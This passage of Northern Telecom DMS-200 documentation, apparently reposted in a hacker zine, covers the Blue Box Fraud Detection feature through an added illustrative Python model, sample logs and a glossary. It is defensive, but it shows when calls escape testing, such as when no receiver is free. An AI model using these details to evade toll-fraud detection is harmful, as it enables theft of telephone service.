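The detection procedure above (unexpected wink, reserved MFR attachment, the four Table 2-1 outcomes, the charge-buffer update, and the CUT and ALARM options), together with the BLUEBOX ACT parameter ranges and the Table 3-1 counters, as an added worked model. This is illustration code written for this edit, not part of the original document and not Northern Telecom software; the class and field names, the (time, kind, payload) event tuples, the timestamps and the telephone numbers are all constructed for the example, and the switch's real internal timers and log formats are not reproduced beyond the log names the document gives.

```python
"""Event-driven model of the DMS-200 Blue Box Fraud Detection flow described above.
Constructed illustration, not Northern Telecom code: it models the BLUEBOX ACT
parameters (nmfr, timeout, ALARM, CUT), the Table 2-1 MFR attachment responses,
the charge-buffer update and the OMSHOW BLUEBOX counters, one trunk at a time."""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# (seconds after the normal call was set up, kind, payload); kind is "wink",
# "digits" (MF digits decoded by the attached MFR), "failure" or "disconnect".
Event = Tuple[int, str, Optional[str]]


@dataclass
class BlueBoxOptions:
    """BLUEBOX ACT parameters, with the ranges from the Commands section."""
    nmfr: int = 1          # MFR reserved from the common pool, 1 through 3
    timeout: int = 30      # seconds an attached MFR waits for digits, 5 through 35
    alarm: bool = False    # ALARM: minor office alarm while a detected call is up
    cut: bool = False      # CUT: disconnect instead of billing the fraudulent digits

    def __post_init__(self) -> None:
        if not (1 <= self.nmfr <= 3 and 5 <= self.timeout <= 35):
            raise ValueError("nmfr must be 1 through 3, timeout 5 through 35")


@dataclass
class OmCounters:
    """The three fields displayed by OMSHOW BLUEBOX (Table 3-1)."""
    BBWinks: int = 0
    BBAttach: int = 0
    BBDetect: int = 0


@dataclass
class CallRecord:
    calling: str
    called: str                 # digits in the charge buffer, i.e. what AMA bills
    blue_box: bool = False      # AMA event information digit set
    cut: bool = False
    alarm_raised: bool = False
    alarm_active: bool = False  # cleared again at call disconnect
    log: List[str] = field(default_factory=list)


class BlueBoxDetector:
    def __init__(self, opts: BlueBoxOptions) -> None:
        self.opts = opts
        self.free_mfr = opts.nmfr   # reserved receivers not attached to a trunk
        self.om = OmCounters()

    def attach_mfr(self) -> bool:
        """Take a reserved MFR; False when all are busy testing other trunks."""
        if self.free_mfr == 0:
            return False
        self.free_mfr -= 1
        self.om.BBAttach += 1
        return True

    def process_call(self, calling: str, called: str, events: List[Event]) -> CallRecord:
        rec = CallRecord(calling, called)
        attached, deadline = False, 0
        for t, kind, payload in events:
            if rec.cut:
                break                                # the switch already cut the call
            if attached and t > deadline:            # MFR Timeout (Table 2-1)
                attached = False
                self.free_mfr += 1
                rec.log.append(f"t={t}: MFR timeout, no fraud assumed")
            if kind == "wink":
                self.om.BBWinks += 1
                if attached:                         # Wink again: reset the timer
                    deadline = t + self.opts.timeout
                elif self.attach_mfr():              # else: no MFR free, not tested
                    attached, deadline = True, t + self.opts.timeout
                    rec.log.append(f"t={t}: MFR attached, {self.opts.timeout}s window")
            elif kind == "digits" and attached:      # Digits: fraud detected
                attached = False
                self.free_mfr += 1
                self.om.BBDetect += 1
                rec.blue_box = True
                if self.opts.alarm:
                    rec.alarm_raised = rec.alarm_active = True
                rec.log.append(f"t={t}: TRK153 BLUEBOX CALL DETECTED, digits {payload}")
                if self.opts.cut:
                    rec.cut, rec.alarm_active = True, False   # cut call is disconnected
                    rec.log.append(f"t={t}: call cut, originator given treatment")
                else:
                    rec.called = payload or rec.called  # only the last fraud is billed
            elif kind == "failure" and attached:     # Call Failure: mutilated digits
                attached = False
                self.free_mfr += 1
            elif kind == "disconnect":
                if rec.blue_box:
                    rec.log.append(f"t={t}: TRK154 BLUEBOX CALL DISCONNECT")
                rec.alarm_active = False
                break
        if attached:                                 # trunk ended while under test
            self.free_mfr += 1
        return rec
```

Feed the events seen on one suspected CAMA trunk to process_call. With CUT unset the charge buffer (rec.called) ends up holding the fraudulent digits, as the Recording section requires; with CUT set the original digits stay and the record is marked cut. Calling attach_mfr once before a call, with nmfr left at 1, reproduces the provisioning note: the unexpected wink is counted in BBWinks but no receiver is free, so the call is never tested.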
Logs

The following six logs are associated with the Blue Box Fraud Detection
feature:

  · AUDT118
  · EXT106
  · TRK151
  · TRK152
  · TRK153
  · TRK154

The following is a brief description and example of each log. See Log
Report Manual, 297-1001-510, for more detailed information.

Table 4-1  Log description

Log      Description

AUDT118  The Audit subsystem generates this log when Blue Box Fraud
         Detection feature data is inconsistent with the corresponding MFR
         data. The identified MFR cannot be used for fraud detection until
         the problem is cleared.

         Example:

           AUDT118 APR12 12:00:00 2112 FAIL BLUEBOX MFR LOST
             CKT RCVRMF 1

EXT106   The External Alarms subsystem generates this log when a fraudulent
         call is detected and when that call disconnects.

         Example:

           *EXT106 MAR14 12:00:00 2112 INFO BLUEBOX ON CALL DETECTED

TRK151   The Trunk Maintenance subsystem generates this log when the
         Bluebox Fraud Detection feature is activated.

         Example:

           TRK151 APR11 12:00:00 2112 INFO BLUEBOX DETECTION ACTIVE
             # OF MFRS = 2 ALARM ENABLED
             CKT RCVRMF 0
             CKT RCVRMF 1
             CKT RCVRMF 2

TRK152   The Trunk Maintenance subsystem generates this log when the
         Bluebox Fraud Detection feature is deactivated.

         Example:

           TRK152 APR04 12:00:00 2112 INFO BLUEBOX DETECTION CLEARED

TRK153   The Trunk Maintenance subsystem generates this log when the
         Bluebox Fraud Detection feature is active and a fraudulent call is
         detected.

         Example:

           TRK153 APR16 12:00:00 2112 INFO BLUEBOX CALL DETECTED
             IC TRUNK = CKT RTP2W 1    CALLING # = 9197811199
             OG TRUNK = CKT CARY2W 2   CALLED # = 61247418888
             CALLED # REPLACED BY 3152651234
             CALLID = 123456

TRK154   The Trunk Maintenance subsystem generates this log when the
         Bluebox Fraud Detection feature is active and a fraudulent call is
         disconnected.
         Example:

           TRK154 APR11 12:00:00 2112 INFO BLUEBOX CALL DISCONNECT
             CKT APEX2W 1 CALLING # = 6133628669
             2 CALLED # = 6124741888
             CALLID = 123456

List of terms

AMA
  Automatic Message Accounting

Automatic Message Accounting
  An automatic recording system that documents all the necessary billing
  data of subscriber-dialed long distance calls.

Batch Change Supplement
  A DMS-100 Family software release.

BCS
  Batch Change Supplement

CAMA
  Centralized Automatic Message Accounting
  A system that produces itemized billing details for subscriber-dialed
  long distance calls. Details are recorded at a central facility serving a
  number of exchanges. In exchanges not equipped for automatic number
  identification, calls are routed to a CAMA operator who obtains the
  calling number and keys it into the computer for billing.

CI
  Command Interpreter

Command Interpreter
  A Support Operating System component that functions as the main
  interface between machine and user. Its principal roles are:
    1 To read lines entered by a terminal user.
    2 To break each line into recognizable units.
    3 To analyze the units.
    4 To recognize command item-numbers on the input lines.
    5 To invoke these commands.

Maintenance and Administration Position
  A group of components that provide a man-machine interface between
  operating company personnel and the DMS-100 Family systems. A MAP
  consists of a Visual Display Unit and keyboard, a voice communications
  Module, test facilities, and MAP furniture. MAP is a trademark of
  Northern Telecom.

MAP
  Maintenance and Administration Position

MF
  Multifrequency

MFR
  Multifrequency Receiver

Multifrequency
  A method that makes use of pairs of standard tones to transmit signaling
  codes, digit pulsing, and coin-control signals.
Northern Telecom Practice
  A document that contains descriptive information about the DMS-100 Family
  hardware and software Modules, and Performance Oriented Practices for
  testing and maintaining the system. NTPs are supplied as part of the
  standard documentation package provided to an operating company.

NTP
  Northern Telecom Practice

PEC
  Product Engineering Code

Product Engineering Code
  An eight character code that provides a unique identification for each
  marketable product manufactured by Northern Telecom.

SF
  Single Frequency

Single Frequency
  A signaling method using a 2600 Hz tone to transmit and receive
  on-hook/off-hook address and supervisory signals. SF is used in
  conjunction with E and M signaling on four-wire trunk facilities.

TOPS
  Traffic Operator Position System

Traffic Operator Position System
  A toll operator's position consisting of a video display and keyboard for
  monitoring call details and entering routing and billing information.
  TOPS is a trademark of Northern Telecom.

|=[ EOF ]=---------------------------------------------------------------=|